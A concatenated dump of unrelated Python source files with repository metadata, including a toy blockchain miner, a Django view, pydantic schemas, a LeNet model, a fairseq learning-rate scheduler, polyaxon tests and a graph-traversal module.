# Keep incrementing the incrementor until it's equal to a number divisible by 9
# and the proof of work of the previous block in the chain
while not (incrementor % 7919 == 0 and incrementor % last_proof == 0):
incrementor += 1
# Check if any node found the solution every 60 seconds
if (int((time.time() - start_time) % 60 ) == 0):
# If any other node got the proof, stop searching
new_blockchain = consensus(blockchain)
if new_blockchain != False:
#(False:another node got proof first, new blockchain)
return (False,new_blockchain)
# Once that number is found, we can return it as a proof of our work
return (incrementor,blockchain)
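# A small self-contained check of the proof-of-work rule above (not used by the
# miner): starting from the genesis proof 9, the next valid proof is the
# smallest number divisible by both 7919 and 9, i.e. 7919 * 9 = 71271.
def _example_next_proof(last_proof=9):
    candidate = last_proof + 1
    while not (candidate % 7919 == 0 and candidate % last_proof == 0):
        candidate += 1
    return candidate  # 71271 when last_proof == 9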
def mine(a, blockchain, node_pending_transactions):
BLOCKCHAIN = blockchain
NODE_PENDING_TRANSACTIONS = node_pending_transactions
while True:
# Get the last proof of work
last_block = BLOCKCHAIN[len(BLOCKCHAIN) - 1]
last_proof = last_block.data['proof-of-work']
# Find the proof of work for the current block being mined
# Note: The program will hang here until a new proof of work is found
proof = proof_of_work(last_proof, BLOCKCHAIN)
        # If another node found the proof first, update our chain and start mining again
if proof[0] == False:
# Update blockchain and save it to file
BLOCKCHAIN = proof[1]
a.send(BLOCKCHAIN)
continue
else:
# Once we find a valid proof of work, we know we can mine a block so
# we reward the miner by adding a transaction
#First we load all pending transactions sent to the node server
NODE_PENDING_TRANSACTIONS = requests.get(MINER_NODE_URL + "/txion?update=" + MINER_ADDRESS).content
NODE_PENDING_TRANSACTIONS = json.loads(NODE_PENDING_TRANSACTIONS)
#Then we add the mining reward
NODE_PENDING_TRANSACTIONS.append({"from": "network", "to": MINER_ADDRESS, "amount": 1})
# Now we can gather the data needed to create the new block
new_block_data = {"proof-of-work": proof[0], "transactions": list(NODE_PENDING_TRANSACTIONS)}
new_block_index = last_block.index + 1
new_block_timestamp = time.time()
last_block_hash = last_block.hash
# Empty transaction list
NODE_PENDING_TRANSACTIONS = []
# Now create the new block
mined_block = Block(new_block_index, new_block_timestamp, new_block_data, last_block_hash)
BLOCKCHAIN.append(mined_block)
# Let the client know this node mined a block
print(json.dumps({"index": new_block_index, "timestamp": str(new_block_timestamp), "data": new_block_data, "hash": last_block_hash}) + "\n")
a.send(BLOCKCHAIN)
requests.get(MINER_NODE_URL + "/blocks?update=" + MINER_ADDRESS)
def find_new_chains():
# Get the blockchains of every other node
other_chains = []
for node_url in PEER_NODES:
# Get their chains using a GET request
block = requests.get(node_url + "/blocks").content
# Convert the JSON object to a Python dictionary
block = json.loads(block)
# Verify other node block is correct
validated = validate_blockchain(block)
if validated == True:
# Add it to our list
other_chains.append(block)
return other_chains
def consensus(blockchain):
# Get the blocks from other nodes
other_chains = find_new_chains()
# If our chain isn't longest, then we store the longest chain
BLOCKCHAIN = blockchain
longest_chain = BLOCKCHAIN
for chain in other_chains:
if len(longest_chain) < len(chain):
longest_chain = chain
# If the longest chain wasn't ours, then we set our chain to the longest
if longest_chain == BLOCKCHAIN:
# Keep searching for proof
return False
else:
# Give up searching proof, update chain and start over again
BLOCKCHAIN = longest_chain
return BLOCKCHAIN
def validate_blockchain(block):
return True
@node.route('/blocks', methods=['GET'])
def get_blocks():
    # Load current blockchain. Only you should update your blockchain.
if request.args.get("update") == MINER_ADDRESS:
global BLOCKCHAIN
BLOCKCHAIN = b.recv()
chain_to_send = BLOCKCHAIN
else:
# Any other node trying to connect to your node will use this
chain_to_send = BLOCKCHAIN
# Convert our blocks into dictionaries so we can send them as json objects later
chain_to_send_json = []
for block in chain_to_send:
block = {
"index": str(block.index),
"timestamp": str(block.timestamp),
"data": str(block.data),
"hash": block.hash
}
chain_to_send_json.append(block)
# Send our chain to whomever requested it
chain_to_send = json.dumps(chain_to_send_json)
return chain_to_send
@node.route('/txion', methods=['GET','POST'])
def transaction():
if request.method == 'POST':
# On each new POST request, we extract the transaction data
new_txion = request.get_json()
# Then we add the transaction to our list
if validate_signature(new_txion['from'],new_txion['signature'],new_txion['message']):
NODE_PENDING_TRANSACTIONS.append(new_txion)
# Because the transaction was successfully
# submitted, we log it to our console
print("New transaction")
print("FROM: {0}".format(new_txion['from']))
print("TO: {0}".format(new_txion['to']))
print("AMOUNT: {0}\n".format(new_txion['amount']))
# Then we let the client know it worked out
return "Transaction submission successful\n"
else:
return "Transaction submission failed. Wrong signature\n"
#Send pending transactions to the mining process
elif request.method == 'GET' and request.args.get("update") == MINER_ADDRESS:
pending = json.dumps(NODE_PENDING_TRANSACTIONS)
# Empty transaction list
NODE_PENDING_TRANSACTIONS[:] = []
return pending
def validate_signature(public_key, signature, message):
public_key = (base64.b64decode(public_key)).hex()
signature = base64.b64decode(signature)
vk = ecdsa.VerifyingKey.from_string(bytes.fromhex(public_key), curve=ecdsa.SECP256k1)
try:
return(vk.verify(signature, message.encode()))
except:
return False
def welcome_msg():
print("Welcome to Ushacoin")
if __name__ == '__main__':
welcome_msg()
#Start mining
a,b=Pipe()
p1 = Process(target = mine, args=(a, BLOCKCHAIN, NODE_PENDING_TRANSACTIONS))
p1.start()
    # Start the server to receive transactions
    p2 = Process(target=node.run)
p2.start()
| 39.995516
| 171
| 0.656352
|
4e42118549688739a453af9c0681d8e9ff81dbaa
| 372
|
py
|
Python
|
irrigator_pro/farms/empty_view.py
|
warnes/irrigatorpro
|
4838f8832bdbf87f394a0298adc5dabfc26e82e8
|
[
"MIT"
] | null | null | null |
irrigator_pro/farms/empty_view.py
|
warnes/irrigatorpro
|
4838f8832bdbf87f394a0298adc5dabfc26e82e8
|
[
"MIT"
] | null | null | null |
irrigator_pro/farms/empty_view.py
|
warnes/irrigatorpro
|
4838f8832bdbf87f394a0298adc5dabfc26e82e8
|
[
"MIT"
] | null | null | null |
from django.views.generic import TemplateView
from django.utils.decorators import method_decorator
from django.contrib.auth.decorators import login_required
class EmptyView(TemplateView):
template_name = 'farms/empty.html'
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(EmptyView, self).dispatch(*args, **kwargs)
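# A minimal sketch of wiring this view into a URLconf (illustration only; the
# pattern, name and import path are assumptions and depend on the Django
# version in use):
#
#     from django.conf.urls import url
#     from farms.empty_view import EmptyView
#
#     urlpatterns = [
#         url(r'^farms/empty/$', EmptyView.as_view(), name='farms_empty'),
#     ]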
| 33.818182
| 63
| 0.774194
|
e839d795869acef91e050db28bbbc710e2d82dec
| 554
|
py
|
Python
|
src/modist/app/schemas/security.py
|
modist-io/modist-api
|
827d4b1962caee9a2fde1470df30d8fd60f8f998
|
[
"0BSD"
] | 1
|
2021-01-03T00:20:07.000Z
|
2021-01-03T00:20:07.000Z
|
src/modist/app/schemas/security.py
|
modist-io/modist-api
|
827d4b1962caee9a2fde1470df30d8fd60f8f998
|
[
"0BSD"
] | null | null | null |
src/modist/app/schemas/security.py
|
modist-io/modist-api
|
827d4b1962caee9a2fde1470df30d8fd60f8f998
|
[
"0BSD"
] | null | null | null |
# -*- encoding: utf-8 -*-
# Copyright (c) 2020 Modist Team <admin@modist.io>
# ISC License <https://choosealicense.com/licenses/isc>
"""Contains schemas related to security routes and services."""
from typing import List
from pydantic import BaseModel
class JWTPayloadSchema(BaseModel):
"""Describes the JWT payload structure."""
sub: str
exp: int
iat: int
scopes: List[str]
display_name: str
class TokenSchema(BaseModel):
"""Describes the OAuth2 token payload structure."""
access_token: str
token_type: str
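A small sketch of how these pydantic schemas might be exercised: constructing a JWTPayloadSchema from decoded claims and serializing a TokenSchema. The import path is inferred from this record's file path and the claim values are invented.

import time

from modist.app.schemas.security import JWTPayloadSchema, TokenSchema  # path inferred from this record

payload = JWTPayloadSchema(
    sub="user-123",                # subject / user id (example value)
    exp=int(time.time()) + 3600,   # expires in one hour
    iat=int(time.time()),          # issued now
    scopes=["read", "write"],
    display_name="Example User",
)
token = TokenSchema(access_token="opaque-or-jwt-string", token_type="bearer")

# pydantic validates field types on construction and can round-trip to dict/JSON.
print(payload.dict())
print(token.json())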
| 20.518519
| 63
| 0.698556
|
84ccb05f5591a5aaa47b58271afbb852d0c915ca
| 1,354
|
py
|
Python
|
montage.py
|
sergentd/neural_style_transfer
|
f8a856ec387c092e0df757566ca5d8894d118fb3
|
[
"MIT"
] | null | null | null |
montage.py
|
sergentd/neural_style_transfer
|
f8a856ec387c092e0df757566ca5d8894d118fb3
|
[
"MIT"
] | null | null | null |
montage.py
|
sergentd/neural_style_transfer
|
f8a856ec387c092e0df757566ca5d8894d118fb3
|
[
"MIT"
] | null | null | null |
# import necessary packages
from conf import config as conf
from imutils import build_montages
from imutils import paths
import numpy as np
import imutils
import argparse
import cv2
import os
# grab the reference to the list of images we want to include in the montage
origPaths = list(paths.list_images(conf.ORIG_DIR))
deepPaths = list(paths.list_images(conf.DEEP_DIR))
# randomly pick a subset of files to include in the montage and initialize the
# list of images
(lines, columns) = conf.MONTAGE_TILES
idxs = np.arange(0, len(origPaths))  # arange already excludes the stop value
idxs = np.random.choice(idxs, size=min(int(lines*columns/2),
len(origPaths)), replace=False)
images = []
# loop over the selected indexes and load each image pair from disk, then add
# them to the list of images for the montage
for i in idxs:
orig = origPaths[i]
deep = os.path.sep.join([conf.DEEP_DIR, os.path.basename(orig)])
images.append(cv2.imread(orig))
images.append(cv2.imread(deep))
# create the montage
montage = build_montages(images, conf.MONTAGE_SIZE, conf.MONTAGE_TILES)[0]
# check to see if we need to display the legend on the image
if conf.MONTAGE_LEGEND:
cv2.putText(montage, "press any key to continue...", (30, 30),
cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255), 2)
# show the images side by side for a clear comparison
cv2.imshow("Orig vs. Deep", montage)
cv2.waitKey(0)
| 32.238095
| 76
| 0.742245
|
83f0aa7a6c35b3d08e47fd7fe2ca8569ea725b7b
| 734
|
py
|
Python
|
examples/captcha_examples.py
|
Ziki2001/new-school-sdk
|
b606e666888e1c9813e2f1a6a64bbede3744026e
|
[
"MIT"
] | 9
|
2021-09-03T11:55:08.000Z
|
2022-01-29T04:42:01.000Z
|
examples/captcha_examples.py
|
Ziki2001/new-school-sdk
|
b606e666888e1c9813e2f1a6a64bbede3744026e
|
[
"MIT"
] | 15
|
2022-01-06T08:45:47.000Z
|
2022-03-31T13:45:07.000Z
|
examples/captcha_examples.py
|
Ziki2001/new-school-sdk
|
b606e666888e1c9813e2f1a6a64bbede3744026e
|
[
"MIT"
] | 6
|
2021-12-01T04:52:06.000Z
|
2022-01-29T04:42:04.000Z
|
# -*- coding: utf-8 -*-
'''
:file: use_verify.py
:author: -Farmer
:url: https://blog.farmer233.top
:date: 2022/01/14 21:33:06
'''
from school_sdk.client import UserClient
from school_sdk import SchoolClient
# Instantiate the school client
# and set captcha_type to "kaptcha" or "captcha" depending on the captcha type
# Use Kaptcha (a captcha similar to the one in the old version of the system)
Gdust = SchoolClient("172.16.254.1", exist_verify=True, captcha_type="kaptcha")
# Use captcha (slider captcha)
Gdust = SchoolClient("172.16.254.1", exist_verify=True, captcha_type="captcha")
# Instantiate the user
user: UserClient = Gdust.user_login("account", "password")
# Get the class schedule
course = user.get_schedule(year=2021, term=1)
print(course)
# Get scores: grades for the first term of the 2020-2021 academic year
score = user.get_score(year=2020, term=1)
print(score)
# Get personal information
info = user.get_info()
print(info)
| 22.242424
| 79
| 0.724796
|
19846a50ce08052183af0f414bad881e5340ce64
| 1,396
|
py
|
Python
|
code/models/LeNet.py
|
ArvindSubramaniam/Pruning-Networks-using-Neuron2Neuron-Skip-Connections
|
bbe402bbf4c5afb4ae712354e8fca5ce320501b8
|
[
"Apache-2.0"
] | 1
|
2021-11-16T03:36:51.000Z
|
2021-11-16T03:36:51.000Z
|
code/models/LeNet.py
|
ArvindSubramaniam/Pruning-Networks-using-Neuron2Neuron-Skip-Connections
|
bbe402bbf4c5afb4ae712354e8fca5ce320501b8
|
[
"Apache-2.0"
] | null | null | null |
code/models/LeNet.py
|
ArvindSubramaniam/Pruning-Networks-using-Neuron2Neuron-Skip-Connections
|
bbe402bbf4c5afb4ae712354e8fca5ce320501b8
|
[
"Apache-2.0"
] | 3
|
2020-12-29T01:52:01.000Z
|
2021-11-16T03:36:52.000Z
|
import torch
import torch.nn as nn
import torch.optim
import torch.nn.functional as F
class LeNet5(nn.Module):
def __init__(self):
super(LeNet5, self).__init__()
# input channel = 1, output channel = 6, kernel_size = 5
# input size = (32, 32), output size = (28, 28)
self.conv1 = nn.Conv2d(1, 6, 5)
# input channel = 6, output channel = 16, kernel_size = 5
# input size = (14, 14), output size = (10, 10)
self.conv2 = nn.Conv2d(6, 16, 5)
# input dim = 16*5*5, output dim = 120
self.fc1 = nn.Linear(16 * 5 * 5, 120)
# input dim = 120, output dim = 84
self.fc2 = nn.Linear(120, 84)
# input dim = 84, output dim = 10
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
# pool size = 2
# input size = (28, 28), output size = (14, 14), output channel = 6
x = F.max_pool2d(F.relu(self.conv1(x)), 2)
# pool size = 2
# input size = (10, 10), output size = (5, 5), output channel = 16
x = F.max_pool2d(F.relu(self.conv2(x)), 2)
# flatten as one dimension
x = x.view(x.size()[0], -1)
# input dim = 16*5*5, output dim = 120
x = F.relu(self.fc1(x))
# input dim = 120, output dim = 84
x = F.relu(self.fc2(x))
# input dim = 84, output dim = 10
x = self.fc3(x)
return x
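A brief usage sketch checking the shapes described in the comments above: a batch of 1-channel 32x32 inputs should yield a (batch, 10) output. It assumes the LeNet5 class defined above is in scope.

import torch

model = LeNet5()
model.eval()

# Dummy mini-batch: 4 images, 1 channel, 32x32, matching the comments in __init__.
x = torch.randn(4, 1, 32, 32)
with torch.no_grad():
    logits = model(x)

print(logits.shape)  # expected: torch.Size([4, 10])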
| 34.04878
| 75
| 0.532951
|
84a1382812464141654e9f3ed4166db0ee5d8935
| 127
|
py
|
Python
|
examples/preprocess/showpoint.py
|
pysrc/cvauto
|
90466de8d6a56b7489ef2ad1139cdb4aafe84e9f
|
[
"MIT"
] | 5
|
2018-09-29T13:57:48.000Z
|
2022-03-10T03:04:30.000Z
|
examples/preprocess/showpoint.py
|
pysrc/cvauto
|
90466de8d6a56b7489ef2ad1139cdb4aafe84e9f
|
[
"MIT"
] | 1
|
2019-01-24T23:56:00.000Z
|
2019-02-12T07:51:16.000Z
|
examples/preprocess/showpoint.py
|
pysrc/cvauto
|
90466de8d6a56b7489ef2ad1139cdb4aafe84e9f
|
[
"MIT"
] | null | null | null |
from cvauto import position
p = position.Position()
k = position.KeyType('7.png', dx=153, dy=-77)
p.getPosition(k, debug=True)
| 25.4
| 45
| 0.724409
|
5199b09a3ecda65f2b31cda3afe1248c16ad7ac5
| 4,755
|
py
|
Python
|
fairseq/optim/lr_scheduler/reduce_lr_on_plateau.py
|
kai-xl8/fairseq
|
fd080b308e1e3361d6c498b235496080fa6599e5
|
[
"MIT"
] | 143
|
2020-12-30T21:40:00.000Z
|
2022-01-06T21:19:24.000Z
|
fairseq/optim/lr_scheduler/reduce_lr_on_plateau.py
|
kai-xl8/fairseq
|
fd080b308e1e3361d6c498b235496080fa6599e5
|
[
"MIT"
] | 5
|
2021-05-24T08:56:59.000Z
|
2021-11-19T09:21:31.000Z
|
fairseq/optim/lr_scheduler/reduce_lr_on_plateau.py
|
kai-xl8/fairseq
|
fd080b308e1e3361d6c498b235496080fa6599e5
|
[
"MIT"
] | 20
|
2021-03-27T10:30:32.000Z
|
2022-03-17T17:13:41.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import torch.optim.lr_scheduler
from . import register_lr_scheduler, LegacyFairseqLRScheduler
@register_lr_scheduler('reduce_lr_on_plateau')
class ReduceLROnPlateau(LegacyFairseqLRScheduler):
"""
Decay the LR by a factor every time the validation loss plateaus.
Also comes with optional warmup phase, where we linearly increase
the learning rate from some initial learning rate
(``--warmup-init-lr``) until the configured learning rate
(``--lr``). Thereafter the lr is adjusted according to original
reduce_on_plateau scheme.
During warmup::
lrs = torch.linspace(
args.warmup_init_lr, args.lr, args.warmup_updates
)
lr = lrs[update_num]
"""
def __init__(self, args, optimizer):
super().__init__(args, optimizer)
if len(args.lr) > 1:
raise ValueError(
'Cannot use a fixed learning rate schedule with reduce_lr_on_plateau.'
' Consider --lr-scheduler=fixed instead.'
)
self.lr_scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(
self.optimizer.optimizer, patience=args.lr_patience, factor=args.lr_shrink,
mode='max' if args.maximize_best_checkpoint_metric else 'min',
threshold=args.lr_threshold)
warmup_end_lr = args.lr[0]
# if no warm up, sets initial lr to be args.lr[0]
if args.warmup_init_lr < 0:
args.warmup_init_lr = 0 if args.warmup_updates > 0 else warmup_end_lr
# linearly warmup for the first args.warmup_updates
if args.warmup_updates > 0:
self.lr_step = (warmup_end_lr - args.warmup_init_lr) / args.warmup_updates
# this flag is either set from arg when no warm up, or set by
# step_update() when warmup finishes
self.warmup_end = True if args.warmup_updates <= 0 else False
# initial learning rate
# this self.lr is used only during init and/or warm up period
self.lr = args.warmup_init_lr
self.optimizer.set_lr(self.lr)
@staticmethod
def add_args(parser):
"""Add arguments to the parser for this LR scheduler."""
# fmt: off
parser.add_argument('--lr-shrink', default=0.1, type=float, metavar='LS',
help='shrink factor for annealing, lr_new = (lr * lr_shrink)')
parser.add_argument('--lr-threshold', default=1e-4, type=float, metavar='LT',
help='threshold for measuring the new optimum, '
'to only focus on significant changes')
parser.add_argument('--lr-patience', default=0, type=int,
help='number of epochs with no improvement after which '
'learning rate will be reduced')
parser.add_argument('--warmup-updates', default=0, type=int, metavar='N',
help='warmup the learning rate linearly for the first N updates')
parser.add_argument('--warmup-init-lr', default=-1, type=float, metavar='LR',
help='initial learning rate during warmup phase; default is args.lr')
# fmt: on
def state_dict(self):
"""Return the LR scheduler state dict."""
return {
'best': self.lr_scheduler.best,
'last_epoch': self.lr_scheduler.last_epoch,
}
def load_state_dict(self, state_dict):
"""Load an LR scheduler state dict."""
self.lr_scheduler.best = state_dict['best']
if 'last_epoch' in state_dict:
self.lr_scheduler.last_epoch = state_dict['last_epoch']
def step(self, epoch, val_loss=None):
"""
        Update the learning rate at the end of the given epoch if warmup
        has finished; otherwise the lr is not updated on epoch boundaries.
"""
if val_loss is not None and self.warmup_end is True:
self.lr_scheduler.step(val_loss)
else:
self.lr_scheduler.last_epoch = epoch
return self.optimizer.get_lr()
def step_update(self, num_updates):
"""
Update the learning rate after each update."""
# if there is warmup
if self.args.warmup_updates > 0:
if num_updates <= self.args.warmup_updates:
self.lr = self.args.warmup_init_lr + num_updates*self.lr_step
self.optimizer.set_lr(self.lr)
else:
if self.warmup_end is False:
self.warmup_end = True
# else do nothing
return self.optimizer.get_lr()
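A plain-PyTorch sketch of the scheme the docstring describes (linear warmup per update, then ReduceLROnPlateau on a validation metric). This is not the fairseq wrapper itself; the hyperparameter values and the fake validation loss are made up for illustration.

import torch

model = torch.nn.Linear(10, 2)
optimizer = torch.optim.SGD(model.parameters(), lr=0.0)  # lr is set manually below

warmup_updates, warmup_init_lr, target_lr = 100, 1e-7, 0.1
lr_step = (target_lr - warmup_init_lr) / warmup_updates
plateau = torch.optim.lr_scheduler.ReduceLROnPlateau(
    optimizer, mode="min", factor=0.1, patience=0, threshold=1e-4)

for update in range(1, 301):
    if update <= warmup_updates:
        lr = warmup_init_lr + update * lr_step       # linear warmup phase
        for group in optimizer.param_groups:
            group["lr"] = lr
    # ... a training step would go here ...
    if update % 100 == 0:                            # pretend an epoch ended
        fake_val_loss = 1.0                          # a plateauing metric
        plateau.step(fake_val_loss)                  # may shrink lr by `factor`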
| 42.079646
| 97
| 0.625026
|
ff2a75249387f174a4c0637e45daad435e93902d
| 3,318
|
py
|
Python
|
tests/test_api/test_project.py
|
granularai/polyaxon-schemas
|
017ae74701f21f12f0b25e75379681ea5d8baa9e
|
[
"MIT"
] | null | null | null |
tests/test_api/test_project.py
|
granularai/polyaxon-schemas
|
017ae74701f21f12f0b25e75379681ea5d8baa9e
|
[
"MIT"
] | null | null | null |
tests/test_api/test_project.py
|
granularai/polyaxon-schemas
|
017ae74701f21f12f0b25e75379681ea5d8baa9e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import uuid
from unittest import TestCase
from hestia.tz_utils import local_now
from marshmallow import ValidationError
from tests.utils import assert_equal_dict
from polyaxon_schemas.api.experiment import ExperimentConfig
from polyaxon_schemas.api.group import GroupConfig
from polyaxon_schemas.api.project import ProjectConfig
class TestProjectConfigs(TestCase):
def test_validate_project_name_config(self):
config_dict = {'name': 'test sdf', 'description': '', 'is_public': True}
with self.assertRaises(ValidationError):
ProjectConfig.from_dict(config_dict)
def test_project_config(self):
config_dict = {
'name': 'test',
'description': '',
'is_public': True,
'has_code': True,
'has_tensorboard': True,
'tags': ['foo'],
'num_experiments': 0,
'num_independent_experiments': 0,
'num_experiment_groups': 0,
'num_jobs': 0,
'num_builds': 0,
'created_at': local_now().isoformat(),
'updated_at': local_now().isoformat()
}
config = ProjectConfig.from_dict(config_dict)
config_to_dict = config.to_dict()
config_to_dict.pop('id', None)
config_to_dict.pop('experiment_groups', None)
config_to_dict.pop('experiments', None)
config_to_dict.pop('has_notebook', None)
config_to_dict.pop('unique_name', None)
config_to_dict.pop('user', None)
config_to_dict.pop('owner', None)
config_to_dict.pop('uuid', None)
assert config_to_dict == config_dict
config_dict.pop('description')
config_dict.pop('updated_at')
config_dict.pop('has_code')
config_to_dict = config.to_light_dict()
config_to_dict.pop('has_notebook', None)
config_to_dict.pop('unique_name', None)
assert config_to_dict == config_dict
config_to_dict = config.to_dict(humanize_values=True)
assert config_to_dict.pop('created_at') == 'a few seconds ago'
assert config_to_dict.pop('updated_at') == 'a few seconds ago'
config_to_dict = config.to_light_dict(humanize_values=True)
assert config_to_dict.pop('created_at') == 'a few seconds ago'
def test_project_experiments_and_groups_config(self):
uuid_value = uuid.uuid4().hex
config_dict = {'name': 'test',
'description': '',
'is_public': True,
'experiment_groups': [
GroupConfig(content='content',
uuid=uuid_value,
project=uuid_value).to_dict()],
'experiments': [
ExperimentConfig(uuid=uuid_value,
project=uuid_value).to_dict()]}
config = ProjectConfig.from_dict(config_dict)
assert_equal_dict(config_dict, config.to_dict())
config_dict.pop('description')
config_dict.pop('experiment_groups')
config_dict.pop('experiments')
assert_equal_dict(config_dict, config.to_light_dict())
| 39.5
| 80
| 0.611513
|
e9ab97528d3db952aba3238b817240a777ca1c2c
| 21,010
|
py
|
Python
|
openrtdynamics2/lang/diagram_core/graph_traversion.py
|
OpenRTDynamics/PythonAPI_Experiments
|
1b7a114110089bc7721da604c5e344854ed555c3
|
[
"MIT"
] | null | null | null |
openrtdynamics2/lang/diagram_core/graph_traversion.py
|
OpenRTDynamics/PythonAPI_Experiments
|
1b7a114110089bc7721da604c5e344854ed555c3
|
[
"MIT"
] | null | null | null |
openrtdynamics2/lang/diagram_core/graph_traversion.py
|
OpenRTDynamics/PythonAPI_Experiments
|
1b7a114110089bc7721da604c5e344854ed555c3
|
[
"MIT"
] | null | null | null |
from .signal_network.signals import *
from .signal_network.Block import *
# from .system import *
from typing import Dict, List
from colorama import init, Fore, Back, Style
init(autoreset=True)
#
# NOTE: this is not used
#
class graph_traversion2:
def __init__(self):
# the list of reachable blocks
self.reachableBlocks = []
# Start forward traversion starting from the given startBlock
def forwardTraverse(self, startBlock : Block):
self.reachableBlocks = []
# fill in self.reachableBlocks
self.forwardTraverse__(startBlock, depthCounter = 0)
# reset graph traversion markers
for block in self.reachableBlocks:
block.graphTraversionMarkerReset()
return self.reachableBlocks
# Start forward traversion starting from the given startBlock
def forwardTraverse__(self, startBlock : Block, depthCounter : int):
tabs = ''
for i in range(0, depthCounter):
tabs += ' '
# print(tabs + "....... depth " + str( depthCounter ) )
#
if startBlock.graphTraversionMarkerMarkIsVisited():
print(tabs + "*** visited *** " + startBlock.name + " (" + str( startBlock.id ) + ") ****") ## TODO investigtare: why is this never reached?
return
# store this block as it is reachable
self.reachableBlocks.append( startBlock )
# make the node as visited
startBlock.graphTraversionMarkerMarkVisited()
print(tabs + "-- " + startBlock.name + " (" + str( startBlock.id ) + ") --" )
# find out the links to other blocks
for signal in startBlock.getOutputSignals():
# for each output signal
print(tabs + "-> S " + signal.name )
if len( signal.getDestinationBlocks() ) == 0:
print(tabs + '-- none --')
for destinationBlock in signal.getDestinationBlocks():
# destinationBlock is a link to a connected block
print( tabs + "*", destinationBlock.name, "(", destinationBlock.id, ")" )
# recursion
self.forwardTraverse__( destinationBlock, depthCounter = depthCounter + 1 )
# Start backward traversion starting from the given startBlock
#
# Note this is not fully tested
# DELETE SOON, if it is not needed
#
def backwardTraverseExec(self, startBlock : Block):
self.reachableBlocks = []
# fill in self.reachableBlocks
self.backwardTraverseExec__(startBlock, depthCounter = 0)
# reset graph traversion markers
for block in self.reachableBlocks:
block.graphTraversionMarkerReset()
return self.reachableBlocks
# Start backward traversion starting from the given startBlock
def backwardTraverseExec__(self, startBlock : Block, depthCounter : int):
tabs = ''
for i in range(0, depthCounter):
tabs += ' '
#print(tabs + "....... depth " + str( depthCounter ) )
#
if startBlock.graphTraversionMarkerMarkIsVisited():
print(tabs + "*** visited *** " + startBlock.name + " (" + str( startBlock.id ) + ") ****") ## TODO investigtare: why is this never reached?
return
# check of the block 'startBlock'
#if config_request_define_feedforward_input_dependencies( signal )
# store this block as it is reachable
self.reachableBlocks.append( startBlock )
# make the node as visited
startBlock.graphTraversionMarkerMarkVisited()
print(tabs + "--- " + startBlock.name + " (" + str( startBlock.id ) + ") --" )
# find out the links to other blocks
for signal in startBlock.getInputSignals():
# for each output signal
print(tabs + "-> S " + signal.name )
if signal.getSourceBlock() is None:
print(tabs + '-- ERROR: no input signal defined for this block! --')
else:
print( tabs + "*", signal.getSourceBlock().name, "(", signal.getSourceBlock().id, ")" )
self.forwardTraverse__( signal.getSourceBlock(), depthCounter = depthCounter + 1 )
class ExecutionLine():
"""
This is a data structure
It contains a list 'signalOrder' of signals to be computed in the given order.
The computation of these signals depends on a list of signals given by
'dependencySignals'.
"""
def __init__(
self,
signalOrder : List[ Signal ],
dependencySignals : List[ Signal ],
dependencySignalsSimulationInputs : List[ Signal ],
blocksToUpdateStates : List[ Block ],
dependencySignalsThroughStates : List[ Signal ]
):
self.signalOrder = signalOrder
self.dependencySignals = dependencySignals # TODO: check if this is still needed.
self.dependencySignalsSimulationInputs = dependencySignalsSimulationInputs
self.blocksToUpdateStates = blocksToUpdateStates
self.dependencySignalsThroughStates = dependencySignalsThroughStates
def printExecutionLine(self):
print("------ print of execution line -----")
print(Fore.RED + "dependent sources of any kind:")
for s in self.dependencySignals:
print(" - " + s.name )
print(Fore.RED + "dependent sources (simulation inputs):")
for s in self.dependencySignalsSimulationInputs:
print(" - " + s.name )
print(Fore.RED + "dependent sources (through state-dependend blocks):")
for s in self.dependencySignalsThroughStates:
print(" - " + s.name )
print(Fore.GREEN + "execution order:")
for s in self.signalOrder:
print(" - " + s.name )
print(Fore.GREEN + "blocks whose states must be updated:")
for block in self.blocksToUpdateStates:
print(" - " + block.name )
def getSignalsToExecute(self):
l = []
l.extend( self.signalOrder )
return l
def appendExecutionLine(self, executionLineToAppend):
# merge dependencySignals: only add the elements of executionLineToAppend.dependencySignals
# to self.dependencySignals that are not part of self.dependencySignals or self.signalOrder
# TODO: to optimize: use sets to merge
# for s in executionLineToAppend.dependencySignals:
# if not s in self.dependencySignals and not s in self.signalOrder:
# self.dependencySignals.append(s)
for s in executionLineToAppend.dependencySignalsSimulationInputs:
if not s in self.dependencySignalsSimulationInputs and not s in self.signalOrder:
self.dependencySignalsSimulationInputs.append(s)
for s in executionLineToAppend.dependencySignalsThroughStates:
if not s in self.dependencySignalsThroughStates and not s in self.signalOrder:
self.dependencySignalsThroughStates.append(s)
original_list_tmp = self.signalOrder.copy()
for s in executionLineToAppend.signalOrder:
# TODO: (for optimization purposes)
            # check if there are common blocks in the list (only in case a block has more than one
            # output signal and one of these signals is in the list executionLineToAppend.signalOrder
            # and another one in self.signalOrder)
            # just append the signal
if not s in original_list_tmp:
self.signalOrder.append( s )
else:
print("appendExecutionLine: skipped to add " + s.name)
original_list_tmp = self.blocksToUpdateStates.copy()
for b in executionLineToAppend.blocksToUpdateStates:
# TODO: (for optimization purposes)
            # check if there are common blocks in the list.
            # just append the block
if not b in original_list_tmp:
self.blocksToUpdateStates.append( b )
class BuildExecutionPath:
"""
Find out the order in which signals have to be computed such that a given signal
'signal_to_calculate' can be calculated. This means finding out all dependencies of
'signal_to_calculate'. For each call to 'determine_execution_order' only the signals that
were not already marked as a dependency in previous calls are returned.
Each call to 'determine_execution_order' gives an instance 'ExecutionLine'
"""
def __init__(self, show_print:int=0):
self._show_print = show_print
# list of marked signals (important to reset their visited flags)
self.marked_signals = []
# number of calls to determine_execution_order()
self.level = 0
def __del__(self):
        # reset the graph markers stored in the signals
self.reset_markers()
def determine_execution_order(self, signal_to_calculate : Signal, current_system):
"""
        get the computation steps and the order in which they have to be
        performed to compute 'signal_to_calculate'
For each call to this function, a list is generated that does not contain
signals that are already part of a previous list (that are already computed)
This function can be called multiple times and returns only the necessary
computations. Computations already planned in previous calls of this function
are not listed again. (until reset_markers() is called)
-- results --
        execution_order contains the list of signals to compute in the correct order including
        the target signals. Not included in this list are signals that cross the border to the simulation
        specified by signal_to_calculate.system (coming from an outer system). Further, not included are
        signals that have been computed in a previous call to determine_execution_order().
        dependency_signals contains all signals that are required to compute 'signal_to_calculate'
        and either cross the border of the simulation, were already computed in a previous
        call, or have no dependencies of their own.
"""
# TODO: dependency signals should stay as they are but reachableSignals should not contain signals
